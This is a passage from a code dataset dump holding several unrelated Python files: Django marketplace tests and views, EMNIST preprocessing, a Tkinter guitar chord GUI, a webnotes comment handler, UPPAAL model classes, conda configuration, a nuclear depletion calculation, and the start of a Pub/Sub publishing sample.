eq_(r.status_code, 200)\n eq_(pq(r.content)('#lang_form').length, 0)\n\n def test_language_selector(self):\n r = self.client.get(self.url)\n eq_(r.status_code, 200)\n eq_(pq(r.content)('#lang_form').length, 1)\n\n\nclass TestMobileDetail(amo.tests.MobileTest, WebappTest):\n\n def test_page(self):\n r = self.client.get(self.url)\n eq_(r.status_code, 200)\n self.assertTemplateUsed(r, 'addons/mobile/details.html')\n doc = pq(r.content)\n eq_(doc('title').text(), '%s :: Apps Marketplace' % self.webapp.name)\n eq_(doc('h3').text(), unicode(self.webapp.name))\n\n def test_downloads(self):\n doc = pq(self.client.get(self.url).content)('table')\n eq_(doc('.adu').length, 0)\n eq_(doc('.downloads td').text(),\n numberfmt(self.webapp.weekly_downloads))\n self.webapp.update(weekly_downloads=0)\n doc = pq(self.client.get(self.url).content)('table')\n eq_(doc('.downloads').length, 0)\n\n def test_no_release_notes(self):\n r = self.client.get(self.url)\n eq_(pq(r.content)('.versions').length, 0)\n\n\nclass TestSharing(WebappTest):\n\n def test_redirect_sharing(self):\n r = self.client.get(reverse('apps.share', args=['yeah']),\n {'service': 'delicious'})\n d = {\n 'title': page_title({'request': r}, self.webapp.name,\n force_webapps=True),\n 'description': truncate(self.webapp.summary, length=250),\n 'url': absolutify(self.webapp.get_url_path()),\n }\n url = iri_to_uri(get_service('delicious').url.format(**d))\n self.assertRedirects(r, url, status_code=302, target_status_code=301)\n\n\nclass TestReportAbuse(WebappTest):\n\n def setUp(self):\n super(TestReportAbuse, self).setUp()\n self.abuse_url = reverse('apps.abuse', args=[self.webapp.app_slug])\n\n def test_page(self):\n r = self.client.get(self.abuse_url)\n eq_(r.status_code, 200)\n doc = pq(r.content)\n eq_(doc('title').text(), 'Report abuse for woo :: Apps Marketplace')\n expected = [\n ('Apps Marketplace', reverse('apps.home')),\n ('Apps', reverse('apps.list')),\n (unicode(self.webapp.name), self.url),\n ]\n amo.tests.check_links(expected, doc('#breadcrumbs a'))\n\n\n@patch.object(settings, 'WEBAPPS_RECEIPT_KEY', amo.tests.AMOPaths.sample_key())\nclass TestInstall(amo.tests.TestCase):\n fixtures = ['base/users']\n\n def setUp(self):\n self.addon = Addon.objects.create(type=amo.ADDON_WEBAPP)\n self.addon.update(app_slug=self.addon.pk,\n manifest_url='http://cbc.ca/manifest')\n self.user = UserProfile.objects.get(email='regular@mozilla.com')\n self.url = reverse('apps.record', args=[self.addon.app_slug])\n assert self.client.login(username='regular@mozilla.com',\n password='password')\n\n def test_not_record_addon(self):\n self.addon.update(type=amo.ADDON_EXTENSION)\n self.client.post(self.url)\n eq_(self.user.installed_set.count(), 0)\n\n def test_record_logged_out(self):\n self.client.logout()\n res = self.client.post(self.url)\n eq_(res.status_code, 302)\n\n def test_record_install(self):\n res = self.client.post(self.url)\n eq_(res.status_code, 200)\n eq_(self.user.installed_set.count(), 1)\n\n def test_record_multiple_installs(self):\n self.client.post(self.url)\n res = self.client.post(self.url)\n eq_(res.status_code, 200)\n eq_(self.user.installed_set.count(), 1)\n\n @patch.object(settings, 'WEBAPPS_RECEIPT_KEY',\n amo.tests.AMOPaths.sample_key())\n def test_record_receipt(self):\n res = self.client.post(self.url)\n content = json.loads(res.content)\n assert content.get('receipt'), content\n","sub_path":"apps/webapps/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":17937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"402977903","text":"import scipy.io as sc\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\n\n# Crop the images by 14 px and then resize them back to standard dimensions.\n# Finally store the resized image into a commmon array\ndef crop(data, dim):\n # Array to store the cropped images\n cropped_non_chars_images_array = []\n\n for i in range(data.shape[0]):\n # Just to keep track of the iteration\n # print(i)\n\n # Reshape the flatten image data in to the standard dimension\n # and then store the tranpose because after unflattening them\n # the images had horizontal orientation.\n img = data[i].reshape(dim).T\n\n # The 14 column pixels to crop is generated randomly\n pixels_to_crop = np.random.randint(0, 27, size=14)\n\n # Only those 14 pixels are selected to crop the image\n img = img[:, pixels_to_crop]\n\n # And then image is resized into the standard dimensions\n img = cv2.resize(img, dim, interpolation=cv2.INTER_CUBIC)\n\n # Finally, each individual cropped image is appended to the array\n cropped_non_chars_images_array.append(img)\n\n return np.asarray(cropped_non_chars_images_array).reshape((-1, 784))\n\n\ndef main():\n # Load the images\n data = sc.loadmat(\"matlab/emnist-byclass.mat\")['dataset']\n\n # Standard dimension of the images\n dimensions = (28, 28)\n\n # Get the training data\n train_data = data[0][0][0][0][0][0]\n\n # Get the testing data\n test_data = data[0][0][1][0][0][0]\n\n print(\"Will start cropping the train data\")\n # Pre processing on training images\n # and save the non-char images in the below array\n train_non_chars_imgs_arr = crop(train_data, dimensions)\n\n train_data_combined = np.vstack((train_non_chars_imgs_arr, train_data))\n\n train_imgs_labels = np.vstack((np.zeros((train_data.shape[0], 1)), np.ones((train_data.shape[0], 1))))\n\n # Pre processing on testing images\n # and save the non-char images in the below array\n print(\"Now Will start cropping the test data\")\n test_non_chars_imgs_arr = crop(test_data, dimensions)\n test_data_combined = np.vstack((test_non_chars_imgs_arr, test_data))\n test_imgs_labels = np.vstack((np.zeros((test_data.shape[0], 1)), np.ones((test_data.shape[0], 1))))\n # Save both the arrays into a compressed numpy file\n print(\"Last step....Saving the files\")\n np.savez_compressed(\"./cropped_non_chars_imgs\",\n shape_of_data=dimensions,\n train=train_data_combined,\n test=test_data_combined,\n train_label=train_imgs_labels,\n test_label=test_imgs_labels)\n\n\nif __name__ == '__main__':\n main()","sub_path":"Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"319089763","text":"#! python3.5 # -*- coding: utf-8 -*-\r\nimport sys\r\nimport Guitare\r\n\r\nif sys.version[:1] == '3':\r\n import tkinter as TK\r\n \r\nelse:\r\n import Tkinter as TK\r\n\r\nclass GUIAccordGenerator(object):\r\n def __init__(self, master,generator):\r\n self.master = master\r\n self.generator = generator\r\n #self.master.geometry(\"800x600\")\r\n \r\n self.master.title(\"Generateur d'accords\")\r\n self.variation = 1\r\n self.accordStr = TK.StringVar()\r\n self.accordsLst=[]\r\n self.MasterFrame = TK.Frame(master)\r\n self.MasterFrame.pack()\r\n self.FrameLst = TK.LabelFrame(self.MasterFrame,text=\"Liste des notes : \",padx=5,pady=5)\r\n self.FrameLst.pack(side=TK.LEFT,padx=10)\r\n\r\n self.FrameMode = TK.LabelFrame(self.MasterFrame,text=\"Accords disponibles : \",padx=5,pady=5)\r\n self.FrameMode.pack(side=TK.LEFT,padx=10,pady=10)\r\n\r\n self.lst = TK.Listbox(self.FrameLst,height=12)\r\n self.lst.pack()\r\n\r\n #Insertion des elements dans la liste \r\n for item in self.generator.chromatique:\r\n self.lst.insert(TK.END,item)\r\n \r\n self.typesAccord = ['majeur','mineur','sus2','sus4','7','Maj7','m7',\r\n 'mMaj7','Maj7aug','Maj7b5','7b5','aug7','aug','b5',\r\n 'dim','add9','5']\r\n self.coordy=[[1,16],[2,39],[3,60],[4,83],[5,105],[6,127]]\r\n self.coordx=[5,28, 68, 112, 153, 195, 238, 281, 324, 367, 410,\r\n 452, 494, 536, 580, 622, 664, 700]\r\n self.mode = TK.StringVar()\r\n \r\n self.mode.set('majeur')\r\n \r\n for txtType in self.typesAccord:\r\n TK.Radiobutton(self.FrameMode,text=txtType,variable=self.mode,value=txtType,anchor=TK.W,width=25,indicatoron=0,command=self.getrButton).pack()\r\n\r\n \r\n \r\n \r\n self.FrameAccord=TK.Frame(self.MasterFrame, padx=5,pady=5)\r\n self.FrameAccord.pack(padx=10,pady=10)\r\n\r\n self.lst.bind('<ButtonRelease-1>',self.getList)\r\n self.lst.bind('<Double-Button-1>',self.lstAddNote)\r\n self.lst.bind('<Return>',self.getChordTxt)\r\n self.lblAccord=TK.Label(self.FrameAccord,textvariable = self.accordStr)\r\n \r\n self.lblAccord.pack()\r\n\r\n self.FrameBtn = TK.Frame(self.MasterFrame,height=5,width=5)\r\n self.FrameBtn.pack()\r\n _mode = TK.StringVar()\r\n _mode.set('twoway')\r\n self.btnPlay = TK.Button(self.FrameBtn,text=\"Jouer l'accord\",command= lambda:self.generator.playNotes(self.accordsLst,_mode.get()))\r\n self.btnPlay.pack()\r\n \r\n self.chk = TK.Checkbutton(self.FrameBtn,onvalue='twoway',offvalue='oneway',variable=_mode,text=\"Lire dans les deux sens\")\r\n self.chk.pack()\r\n\r\n self.FrameChord = TK.LabelFrame(self.MasterFrame,text=\"Chord retreiver\",padx=5,pady=5)\r\n self.FrameChord.pack(padx=10)\r\n self.lstChordStr = TK.StringVar()\r\n self.lstChordStr.set(\"Entrer une suite de notes\")\r\n self.txtEntry= TK.Entry(self.FrameChord,textvariable=self.lstChordStr,width=25)\r\n self.txtEntry.pack()\r\n self.txtEntry.bind(\"<Return>\",self.getChordTxt)\r\n TK.Label(self.FrameChord,text=\"Transposer en demi ton (capo guitare)\").pack()\r\n self.capo = TK.IntVar()\r\n self.spinbx = TK.Spinbox(self.FrameChord,from_=-12,to=12,textvariable=self.capo,command=self.setCapo)\r\n self.spinbx.pack()\r\n self.spinbx.bind(\"<Return>\",self.setCapo)\r\n self.FrameManche = TK.LabelFrame(master,text=\"Représentation graphique de l'accord\")\r\n self.FrameManche.pack(side=TK.BOTTOM, fill=TK.BOTH,expand=1)\r\n \r\n self.img = TK.PhotoImage(file='images/manche_guitareLittle.gif')\r\n self.canvaManche = TK.Canvas(self.FrameManche,height=150,width=715)\r\n self.canvaManche.pack()\r\n \r\n #TK.Button(master,text='btn',command=self.clic).pack()\r\n self.canvaManche.create_image(0,0,image=self.img,anchor=TK.NW)\r\n #self.cercle(28,16)\r\n self.canvaManche.bind(\"<Button-1>\",self.cercle)\r\n self.canvaManche.bind(\"<Button-3>\",self.delLastCircle)\r\n\r\n #def clic(self):\r\n \r\n \r\n # if self.variation>len(self.generator.ChordPatterns)-1:\r\n # self.variation=0\r\n # idx = self.lst.curselection()\r\n # result = self.lst.get(idx)\r\n # self.getCoordinates(result,self.mode.get(),self.variation) \r\n # self.variation+=1\r\n\r\n def cercle(self,event,x=0,y=0):\r\n \"Dessine un cercle sur le mache de guitare\"\r\n def getNoteFromCoordinates(x,y):\r\n \"Retourne une note en fonction des coordonnées sur l'image/manche\"\r\n numCorde = 0\r\n note=None\r\n for corde,_y in self.coordy:\r\n if _y == y:\r\n numCorde=corde\r\n break\r\n \r\n for _x in self.coordx:\r\n if x==_x:\r\n idx = self.coordx.index(_x)\r\n note = self.generator.FretManche[corde-1][1][idx]\r\n break\r\n if self.lstChordStr.get()==\"Entrer une suite de notes\":\r\n self.lstChordStr.set(note + \" \")\r\n else:\r\n self.lstChordStr.set(self.lstChordStr.get() + note + \" \")\r\n \r\n\r\n\r\n\r\n if event !=None:\r\n x=event.x\r\n y=event.y\r\n\r\n \r\n r=5\r\n \r\n #Recupération de la valeur la plus proche des coordonnées pour avoir les points au bon endroit\r\n lsty=[]\r\n lstx=[]\r\n for _corde,_y in self.coordy:\r\n diff = _y - y\r\n if diff<0:diff=diff*-1\r\n lsty.append(diff)\r\n lstyCp = lsty[:]\r\n lstyCp.sort()\r\n idxY = lsty.index(lstyCp[0])\r\n y = self.coordy[idxY][1]\r\n for _x in self.coordx:\r\n diff = _x - x\r\n if diff<0:diff=diff*-1\r\n lstx.append(diff)\r\n lstxCp = lstx[:]\r\n lstxCp.sort()\r\n idxX = lstx.index(lstxCp[0])\r\n x = self.coordx[idxX]\r\n\r\n\r\n \"tracé d'un cercle de centre (x,y) et de rayon r\"\r\n if x==5:#Si la note est la corde à vide\r\n _color=None\r\n else:\r\n _color='red'\r\n self.canvaManche.create_oval(x-r, y-r, x+r, y+r, outline='black',fill=_color)\r\n\r\n getNoteFromCoordinates(x,y)\r\n\r\n def delLastCircle(self,event):\r\n if len(self.canvaManche.find_all())>1:\r\n item = self.canvaManche.find_all()[-1]\r\n self.canvaManche.delete(item)\r\n\r\n def setCapo(self,event=None):\r\n _capo = self.capo.get()\r\n _lstChordStr = self.txtEntry.get()\r\n \r\n _capoized = []\r\n sensAlteration=''\r\n if _lstChordStr !=\"Entrer une suite de notes\" and _lstChordStr !='':\r\n lstNotes = list(_lstChordStr.split())\r\n \r\n \r\n if _capo>0 : \r\n \r\n sensAlteration=\"plus\"\r\n if event is None:\r\n _capo =_capo - (_capo-1)\r\n else:\r\n sensAlteration=\"moins\"\r\n if event is None:\r\n _capo = _capo - (_capo+1)\r\n for note in lstNotes:\r\n _capoized.append(self.generator.alterer(note,sensAlteration,_capo))\r\n if event != None:\r\n self.capo.set(0)\r\n self.lstChordStr.set(_capoized)\r\n\r\n def getChordTxt(self,event):\r\n lstStr = self.txtEntry.get()\r\n lstStr=lstStr.split()\r\n lstStr=list(set(lstStr))\r\n self.accordStr.set(self.generator.getChord(lstStr))\r\n\r\n def getList(self,event):\r\n \r\n idx = self.lst.curselection()\r\n result = self.lst.get(idx)\r\n self.accordsLst=self.generator.accord(result,self.mode.get())\r\n self.accordStr.set(self.accordsLst)\r\n \r\n def getrButton(self):\r\n if self.lst.curselection():\r\n \r\n result =self.lst.get(self.lst.curselection())\r\n self.accordsLst=self.generator.accord(result,self.mode.get())\r\n self.accordStr.set(self.accordsLst)\r\n \r\n\r\n def lstAddNote(self,event):\r\n if self.lst.curselection():\r\n result =self.lst.get(self.lst.curselection())\r\n if self.lstChordStr.get() == \"Entrer une suite de notes\":\r\n self.lstChordStr.set(result + \" \")\r\n else:\r\n self.lstChordStr.set(self.lstChordStr.get() + result + \" \")\r\n \r\n\r\nroot = TK.Tk()\r\ngenerator = Guitare.Guitare()\r\nGUIAccordGenerator(root,generator)\r\nroot.mainloop()\r\n ","sub_path":"GUIAccordGenerator.py","file_name":"GUIAccordGenerator.py","file_ext":"py","file_size_in_byte":8604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"327875887","text":"# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors\n# MIT License. See license.txt \n\nimport webnotes\nimport webnotes.utils, markdown2\n\nfrom webnotes import _\n\n@webnotes.whitelist(allow_guest=True)\ndef add_comment(args=None):\n\t\"\"\"\n\t\targs = {\n\t\t\t'comment': '',\n\t\t\t'comment_by': '',\n\t\t\t'comment_by_fullname': '',\n\t\t\t'comment_doctype': '',\n\t\t\t'comment_docname': '',\n\t\t\t'page_name': '',\n\t\t}\n\t\"\"\"\n\t\n\tif not args: \n\t\targs = webnotes.local.form_dict\n\targs['doctype'] = \"Comment\"\n\n\tpage_name = args.get(\"page_name\")\n\tif \"page_name\" in args:\n\t\tdel args[\"page_name\"]\n\tif \"cmd\" in args:\n\t\tdel args[\"cmd\"]\n\n\tcomment = webnotes.bean(args)\n\tcomment.ignore_permissions = True\n\tcomment.insert()\n\t\n\t# since comments are embedded in the page, clear the web cache\n\twebnotes.webutils.clear_cache(page_name)\n\n\t# notify commentors \n\tcommentors = [d[0] for d in webnotes.conn.sql(\"\"\"select comment_by from tabComment where\n\t\tcomment_doctype=%s and comment_docname=%s and\n\t\tifnull(unsubscribed, 0)=0\"\"\", (comment.doc.comment_doctype, comment.doc.comment_docname))]\n\t\n\towner = webnotes.conn.get_value(comment.doc.comment_doctype, comment.doc.comment_docname, \"owner\")\n\t\n\tfrom webnotes.utils.email_lib.bulk import send\n\tsend(recipients=list(set(commentors + [owner])), \n\t\tdoctype='Comment', \n\t\temail_field='comment_by', \n\t\tsubject='New Comment on %s: %s' % (comment.doc.comment_doctype, \n\t\t\tcomment.doc.title or comment.doc.comment_docname), \n\t\tmessage='%(comment)s<p>By %(comment_by_fullname)s</p>' % args,\n\t\tref_doctype=comment.doc.comment_doctype, ref_docname=comment.doc.comment_docname)\n\t\n\ttemplate = webnotes.get_template(\"templates/includes/comment.html\")\n\t\n\treturn template.render({\"comment\": comment.doc.fields})\n\t","sub_path":"webnotes/templates/includes/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"131976547","text":"from .Declaration import Declaration\nfrom .Location import Location\nfrom .Transition import Transition\nimport xml.dom.minidom as dom\n\n\nclass Template(object):\n def __init__(self, name: str):\n self.name = name\n self.initial_location = ''\n self.locations = []\n self.transitions = []\n self.declarations = Declaration()\n return\n\n def set_initial_location(self, id: int):\n self.initial_location = 'id' + str(id)\n return\n\n def add_location(self, name: str, id: int):\n location = Location(name, id)\n self.locations.append(location)\n return location\n\n def add_transition(self, source: int, target: int):\n transition = Transition(source, target)\n self.transitions.append(transition)\n return transition\n\n def add_variable_declaration(self, type: int, name: str, value: str):\n return self.declarations.add_variable(type, name, value)\n\n def add_function_declaration(self, type: int, name: str, param: str, code: str):\n return self.declarations.add_function(type, name, param, code)\n\n def writer(self, doc: dom.Document):\n node = doc.createElement('template')\n name = doc.createElement('name')\n name.appendChild(doc.createTextNode(self.name))\n node.appendChild(name)\n\n node.appendChild(self.declarations.writer(doc))\n\n for location in self.locations:\n node.appendChild(location.writer(doc))\n\n init = doc.createElement('init')\n init.setAttribute('ref', self.initial_location)\n node.appendChild(init)\n\n for transition in self.transitions:\n node.appendChild(transition.writer(doc))\n doc.appendChild(node)\n return node\n","sub_path":"uppaal/Template.py","file_name":"Template.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"171944939","text":"# (c) 2012-2015 Continuum Analytics, Inc. / http://continuum.io\n# All Rights Reserved\n#\n# conda is distributed under the terms of the BSD 3-clause license.\n# Consult LICENSE.txt or http://opensource.org/licenses/BSD-3-Clause.\nfrom __future__ import print_function, division, absolute_import, unicode_literals\n\nimport os\nimport sys\nfrom os.path import abspath, expanduser, isfile, join\n\nfrom .base.context import context, non_x86_linux_machines\nnon_x86_linux_machines = non_x86_linux_machines\n\n\n# ----- rc file -----\n\n# This is used by conda config to check which keys are allowed in the config\n# file. Be sure to update it when new keys are added.\n\n#################################################################\n# Also update the example condarc file when you add a key here! #\n#################################################################\n\nrc_list_keys = [\n 'channels',\n 'disallow',\n 'create_default_packages',\n 'track_features',\n 'envs_dirs',\n 'pkgs_dirs',\n 'default_channels',\n 'pinned_packages',\n]\n\nrc_bool_keys = [\n 'add_binstar_token',\n 'add_anaconda_token',\n 'add_pip_as_python_dependency',\n 'always_yes',\n 'always_copy',\n 'allow_softlinks',\n 'always_softlink',\n 'auto_update_conda',\n 'changeps1',\n 'use_pip',\n 'offline',\n 'binstar_upload',\n 'anaconda_upload',\n 'show_channel_urls',\n 'allow_other_channels',\n 'update_dependencies',\n 'channel_priority',\n 'shortcuts',\n]\n\nrc_string_keys = [\n 'channel_alias',\n 'client_ssl_cert',\n 'client_ssl_cert_key',\n 'default_python',\n]\n\n# Not supported by conda config yet\nrc_other = [\n 'proxy_servers',\n]\n\nroot_dir = context.root_prefix\nroot_writable = context.root_writable\n\nuser_rc_path = abspath(expanduser('~/.condarc'))\nsys_rc_path = join(sys.prefix, '.condarc')\n\n\nget_rc_urls = lambda: context.channels\n\n\ndef get_local_urls():\n from .models.channel import get_conda_build_local_url\n return get_conda_build_local_url() or []\n\n\nclass RC(object):\n\n def get(self, key, default=None):\n key = key.replace('-', '_')\n return getattr(context, key, default)\n\n\nrc = RC()\nenvs_dirs = context.envs_dirs\n\n\ndef get_rc_path():\n path = os.getenv('CONDARC')\n if path == ' ':\n return None\n if path:\n return path\n for path in user_rc_path, sys_rc_path:\n if isfile(path):\n return path\n return None\n\n\nrc_path = get_rc_path()\n\npkgs_dirs = list(context.pkgs_dirs)\ndefault_prefix = context.default_prefix\nsubdir = context.subdir\narch_name = context.arch_name\nbits = context.bits\nplatform = context.platform\n\n# put back because of conda build\ndefault_python = context.default_python\nbinstar_upload = context.anaconda_upload\n","sub_path":"python/pyenv.symlink/versions/miniconda3-4.3.11/lib/python3.6/site-packages/conda/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"179757514","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.urls import reverse\n\nfrom osoby.models import Absolwent\nfrom osoby.forms import UserLoginForm, UserCreateForm, UserEditForm\nfrom django.contrib.auth.decorators import login_required\n\n# from django.contrib.auth.forms import UserCreationForm\n\ndef index(request):\n return HttpResponse(\"<h1>Witaj w Django!</h1>\")\n\ndef lista_osob(request):\n osoby = Absolwent.objects.all()\n kontekst = {'osoby': osoby}\n return render(request, 'osoby/lista_osob2.html', kontekst)\n\n\ndef loguj_osobe(request):\n if request.method == 'POST':\n form = UserLoginForm(request.POST)\n if form.is_valid():\n # print(form.cleaned_data)\n nazwa = form.cleaned_data['nazwa']\n haslo = form.cleaned_data['haslo']\n user = authenticate(request, username=nazwa, password=haslo)\n if user is not None:\n login(request, user)\n messages.success(request, \"Zostałeś zalogowany!\")\n return redirect(reverse('osoby:lista'))\n else:\n messages.error(request, \"Błędny login lub hasło!\")\n else:\n form = UserLoginForm()\n kontekst = {'form': form}\n return render(request, 'osoby/loguj_osobe.html', kontekst)\n\n\ndef wyloguj_osobe(request):\n logout(request)\n messages.info(request, \"Zostałeś wylogowany!\")\n return redirect(reverse('osoby:lista'))\n\n\ndef rejestruj_osobe(request):\n if request.method == 'POST':\n form = UserCreateForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, \"Utworzono konto! Możesz się zalogować!\")\n return redirect(reverse('osoby:loguj-osobe'))\n else:\n form = UserCreateForm()\n kontekst = {'form': form}\n return render(request, 'osoby/rejestruj_osobe1.html', kontekst)\n\n\n@login_required()\ndef edytuj_osobe(request):\n try:\n a = Absolwent.objects.filter(user=request.user).first()\n except Absolwent.DoesNotExist:\n a = 0\n # print(a)\n if request.method == 'POST':\n form = UserEditForm(instance=request.user, data=request.POST)\n if form.is_valid():\n # print(form.cleaned_data['klasa'])\n if a:\n a.klasa = form.cleaned_data['klasa']\n a.save()\n else:\n a = Absolwent.objects.create(user=request.user, klasa=form.cleaned_data['klasa'])\n form.save()\n messages.success(request, \"Zaktualizowano dane użytkownika!\")\n return redirect(reverse('osoby:lista'))\n else:\n if a:\n a = a.klasa.id\n form = UserEditForm(instance=request.user, initial={'klasa':a})\n return render(request, 'osoby/edytuj_osobe1.html', {'form': form})","sub_path":"osoby/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"397243947","text":"\n# coding: utf-8\n\n## Approximation to Exponential Using Parabolic Contour\n\n# In[93]:\n\nimport numpy as np\nimport scipy as sp\nimport scipy.sparse as sparse\nimport scipy.sparse.linalg as splinalg\nimport matplotlib.pyplot as plt\n\n#compute exp\nNpoints = (2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32)\nerrors = np.zeros(len(Npoints))\npos = 0\nfor N in Npoints:\n theta = np.pi*np.arange(1,N,2)/N\n z = N*(.1309 - 0.1194*theta**2 + .2500j*theta)\n w = N*(- 2*0.1194*theta + .2500j)\n c = 1.0j/N*np.exp(z)*w\n plt.plot(np.real(z),np.imag(z),'o-')\n u = 0\n for k in range(int(N/2)):\n u -= c[k]/((z[k] + 1))\n errors[pos] = np.abs(2*np.real(u)-0.3678794411714423215955238)\n pos += 1\nplt.xlabel(\"Re(z)\")\nplt.ylabel(\"Im(z)\")\nplt.axis([-40,10,0,30])\nplt.savefig(\"6.pdf\");\nplt.close()\nprint(\"Errors =\",errors)\n\n\n\n## Depletion Example\n\n# In[84]:\n\n#cross-sections in barns\nposition = {'28':0,'29':1,'20':2,'39':3,'30':4,'49':5,'40':6,'41':7,'51':8}\nprevious_cap = {'28':-1,'29':0,'20':1,'39':-1,'30':3,'49':-1,'40':5,'41':6,'51':-1}\nprevious_beta = {'28':-1,'29':-1,'20':-1,'39':1,'30':2,'49':3,'40':4,'41':-1,'51':7}\nsig_gamma = 1.0E-24*np.array([2.7,22.0,0,60,274,290,326,532])\nsig_a = 1.0E-24*np.array([12.0,22,0,60,0,274+698,290+53,326+938,535])\nlam = np.array([0,42.4737,1.17982,0.294956,138.629,0,0,0.000131877,0])\n\nA = np.zeros((9,9))\n\nphi = 1.0e14 * 60 * 60 * 24 #10^14 1/cm^2/s in 1/cm^2/day\nfor i in position:\n row = position[i]\n A[row,row] = -lam[row] - phi*sig_a[row]\n if previous_cap[i]>=0:\n A[row,previous_cap[i]] = phi*sig_gamma[previous_cap[i]]\n if previous_beta[i]>=0:\n A[row,previous_beta[i]] = lam[previous_beta[i]]\nplt.spy(A)\nplt.show()\nb = np.zeros(9)\nb[0] = 1.0\n#plt.savefig(\"98.pdf\");\n#plt.close()\n\n\n\n### Example Matrix Exponential\n\n# In[89]:\n\nNpoints = (32,) #(2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32)\n\nfor N in Npoints:\n pos = 0\n theta = np.pi*np.arange(1,N,2)/N\n z = N*(.1309 - 0.1194*theta**2 + .2500j*theta)\n w = N*(- 2*0.1194*theta + .2500j)\n c = 1.0j/N*np.exp(z)*w\n #plt.plot(np.real(z),np.imag(z),'o-')\n #plt.savefig('hw5.pdf')\n #plt.close()\n u = np.zeros(9)\n for k in range(int(N/2)):\n n,code = splinalg.gmres(z[k]*sparse.identity(9) - A*365,b, tol=1e-12, maxiter=2000)\n if (code):\n print(code)\n u = u- c[k]*n\n u = 2*np.real(u)\n print(u)\n\n\n## HW 5, prob 2\nisotopes = {'H3':0, 'He3':1, 'He4':2, 'He6':3, 'Li6':4, 'Li7':5, 'Li8':6, 'Li9':7,\n 'Be8':8, 'Be9':9, 'Be10':10, 'B10':11}\n\ndef decay(isotopes, tope):\n return None\n\n'''\n# ---------------------------------------------------------------------------\n# ---------------------------------------------------------------------------\n\"\"\"Different Nuclear Reactions\nInputs:\n isotopes: python dictionary containing matrix indices for isotopes\n tope: nucleus that undergoes some nuclear reaction\nOutputs:\n tope: new nucleus created from nulcear reaction\n value: either half-life [days]\n or cross sections for 2.45 MeV and 14.1 MeV [barns]\n\"\"\"\n\ndef betadecay(isotopes, tope):\n if tope == 'F18': return isotopes['O18'], 1.8295 #hours\n\n elif tope == 'H3': return isotopes['He3'], 4500 #days\n elif tope == 'He6': return isotopes['Li6'], 0.8067 #sec\n elif tope == 'Li8': return isotopes['Be8'], 0.8403 #sec\n elif tope == 'Li9': return isotopes['Be9'], 0.1783 #sec\n elif tope == 'Be10': return isotopes['B10'], 1387000 #years\n else: return -1, 0\n\ndef capture(isotopes, tope):\n if tope == 'F19': return isotopes['F20'], 8.649107E-5, 3.495035E-5\n\n else: return -1, 0\n\ndef n_alpha(isotopes, tope):\n\n else: return -1, 0\n\ndef n_p(isotopes, tope):\n if tope == 'F19': return isotopes['O19'], 0.0, 0.018438\n\n if tope == 'Li6': return isotopes['He6'], 0, 0.00604\n elif tope == 'Be9': return isotopes['Li9'], 0, 0\n else: return -1, 0\n\ndef n_d(isotopes, tope):\n if tope == 'F19': return isotopes['O18'], 0.0, 0.022215\n\n if tope == 'Li7': return isotopes['He6'], 0, 0.010024\n elif tope == 'Be9': return isotopes['Li8'], 0, 0\n else: return -1, 0\n\ndef n_t(isotopes, tope):\n if tope == 'Be9': return isotopes['Li7'], 0, 0.020327\n else: return -1, 0\n\ndef n_2n(isotopes, tope):\n if tope == 'F19': return isotopes['F18'], 0.0, 0.04162\n\n if tope == 'Li7': return isotopes['Li6'], 0, 0.031743\n elif tope == 'Be9': return isotopes['Be8'], 0.0205, 0.485944\n else: return -1, 0\n\ndef n_nalpha(isotopes, tope):\n if tope == 'Li7': return isotopes['H3'], 0, 0.302149\n else: return -1, 0\n\ndef n_np(isotopes, tope):\n if tope == 'F19': return isotopes['O18'], 0.0, 0.061973\n\ndef n_nd(isotopes, tope):\n if tope == 'Li6': return isotopes['He4'], 0.05948, 0.473592\n else: return -1, 0\n# ---------------------------------------------------------------------------\n# ---------------------------------------------------------------------------\n\n\nprint(capture(isotopes,'H3'))\nfor tope in isotopes:\n print(isotopes[tope])\n'''\n","sub_path":"Help_from_James/HW5/vaq_hw5.py","file_name":"vaq_hw5.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"193782149","text":"#!/usr/bin/env python\n\n# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"This application demonstrates how to perform basic operations on topics\nwith the Cloud Pub/Sub API.\n\nFor more information, see the README.md under /pubsub and the documentation\nat https://cloud.google.com/pubsub/docs.\n\"\"\"\n\nimport argparse\nimport time\n\nfrom google.cloud import pubsub_v1\n\n\ndef publish_messages(project, topic_name):\n \"\"\"Publishes multiple messages to a Pub/Sub topic.\"\"\"\n publisher = pubsub_v1.PublisherClient()\n topic_path = publisher.topic_path(project, topic_name)\n\n for n in range(1, 600):\n data = u'Message number {}'.format(n)\n # Data must be a bytestring\n data = data.encode('utf-8')\n 